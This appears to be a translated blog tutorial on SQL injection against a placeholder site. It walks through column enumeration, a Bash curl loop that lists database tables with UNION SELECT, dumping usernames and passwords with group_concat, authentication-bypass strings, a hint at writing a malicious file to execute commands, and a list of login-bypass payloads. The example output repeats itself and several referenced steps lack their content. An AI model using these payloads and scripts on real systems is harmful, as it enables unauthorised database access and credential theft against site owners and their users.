SQLI
Basic example applied to fake web service
We verify that the web is vulnerable to SQL injecion:
We enumerate until we match the number of columns to generate the labels:
We take advantage of the generated labels to see if we are able to vew files on the system, as well as to know the versioning of the database service and the user that runs said service:
We begin to list the database tables:
We setup a script in Bash (or in another language) to quickly determine which tables exist on the database, parsing the results depending on the case presented to us:
for i in $(seq 1 200); do
echo -n "for the number $i:"
curl --silent "http://www.webpage.com/contents? Id=-1+UNION+SELECT+1,table_name,3,4,5+from+information_schema.tables+limit+$i--%20-" | grep "Title" | cut -d '>' -f 2 | awk '{print $i}' FS="<"
done
Obtaining results like the following:
For number 63: HEADBOARD
For number 64: DOCUMENTS
For number 65: CONTENTS
For number 66: DOCUMENTS
For number 67: SCHEDULES
For number 68: LANGUAGES
For number 69: IMAGES
For number 70: MODULES
For the number 71: NEWS
For number 72: PERMISSIONS
For number 73: USERS
For number 66: DOCUMENTS
For number 67: SCHEDULES
For number 68: LANGUAGES
For number 69: IMAGES
For number 70: MODULES
For the number 71: NEWS
For number 72: PERMISSIONS
For number 73: USERS
Once the table that interests us is located (for this case, the users table), we list the existing columns for said table in the database:
It is necessary for this step to convert the string users from STRING to ASCII format. We will obtain the following results:
IDUSUERT,IDECOMPANY,USUER,PASSWORD,NAME,ADMINISTRATOR
Once we know the names of the columns, we take advantage of the group_concat functionality to concatenate all the columns whose data we want to visualize:
Obtaining the username and password.
Before getting complicated, it is preferable to test basic injections on authentication panels, this is:
User: admin 'or 1 = 1 -- -
Password: admin 'or 1 = 1 -- -
For cases where we can carry out a new user registration, another way is to create a user with name admin 'or 1 = 1 -- - and password admin 'or 1 = 1 -- -, in this way after subsequently performing authentication As a valid user, we will have access to all user data in the main database.
For bypassing techniques consult the following link
In case we want to execute commands on the system, we can take advantage of the fact that files can be exported from sql queries to generate our malicious one. To do this, we would apply the following syntax as an example:
Next, a payload of tests to be carried out for the logins once we do the conventional one 'or 1 '=' 1:
- '
' '
' & '
' ^ '
' * '
' or ' ' - '
' or ' ' '
' or ' ' & '
' or ' ' ^ '
' or ' ' * '
"-"
""
"&"
"^"
"*"
"or" "-"
"or "" "
" or "" & "
" or "" ^ "
" or "" * "
or true--
" or true--
'or true--
") or true--
') or true--
' or 'x' = 'x
') or ('x') = ('x
')) or (('x')) = (('x
" or " x " = " x
" ) or ( " x " ) = ( " x
" )) or (( " x " )) = (( " x
Post a Comment
Comments here, cracks!